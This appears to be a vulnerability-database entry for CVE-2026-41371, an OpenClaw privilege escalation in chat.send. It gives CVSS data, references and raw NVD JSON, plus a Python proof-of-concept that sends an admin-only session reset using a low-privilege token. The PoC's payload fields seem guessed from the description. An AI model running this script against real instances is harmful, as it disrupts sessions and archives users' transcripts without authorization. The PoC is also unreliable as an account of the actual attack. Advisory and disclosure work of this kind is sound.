CVE-2026-41371

Description

OpenClaw before 2026.3.28 contains a privilege escalation vulnerability in chat.send that allows write-scoped gateway callers to trigger admin-only session reset operations. Attackers can rotate target sessions, archive prior transcript state, and force new session IDs without requiring admin scope by exploiting improper authorization checks in the chat.send path.

CVSS Details

CVSS Score

8.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:* - VULNERABLE

OpenClaw < 2026.3.28

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def exploit_openclaw(target_url, token):
    """
    PoC for CVE-2026-41371: Privilege Escalation via chat.send
    This script demonstrates how a low-privileged user can trigger
    admin-only session reset operations.
    """
    headers = {
        "Authorization": f"Bearer {token}",
        "Content-Type": "application/json"
    }
    
    # Payload to trigger session reset (admin scope action)
    payload = {
        "command": "reset",
        "rotate_session": True,
        "archive_transcript": True,
        "force_new_id": True
    }
    
    try:
        # Send request to the vulnerable endpoint
        response = requests.post(f"{target_url}/api/chat.send", json=payload, headers=headers)
        
        if response.status_code == 200:
            print("[+] Exploit successful! Session reset triggered.")
            print(f"[+] Response: {response.text}")
        else:
            print(f"[-] Exploit failed. Status code: {response.status_code}")
            print(f"[-] Response: {response.text}")
    except Exception as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    target = "http://vulnerable-openclaw-instance"
    user_token = "LOW_PRIVILEGE_TOKEN_HERE"
    exploit_openclaw(target, user_token)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-41371
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-41371
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-41371/
[4] VulDB https://vuldb.com/cve/CVE-2026-41371
[5] https://github.com/openclaw/openclaw/security/advisories/GHSA-5r8f-96gm-5j6g
[6] https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-chat-send-reset-command

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-41371", "sourceIdentifier": "[email protected]", "published": "2026-04-28T00:16:26.497", "lastModified": "2026-04-28T18:44:10.780", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenClaw before 2026.3.28 contains a privilege escalation vulnerability in chat.send that allows write-scoped gateway callers to trigger admin-only session reset operations. Attackers can rotate target sessions, archive prior transcript state, and force new session IDs without requiring admin scope by exploiting improper authorization checks in the chat.send path."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:H/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:L", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.1, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2026.3.28", "matchCriteriaId": "16831C6C-CC20-4318-8F7C-9FCFB12A223F"}]}]}], "references": [{"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-5r8f-96gm-5j6g", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-chat-send-reset-command", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}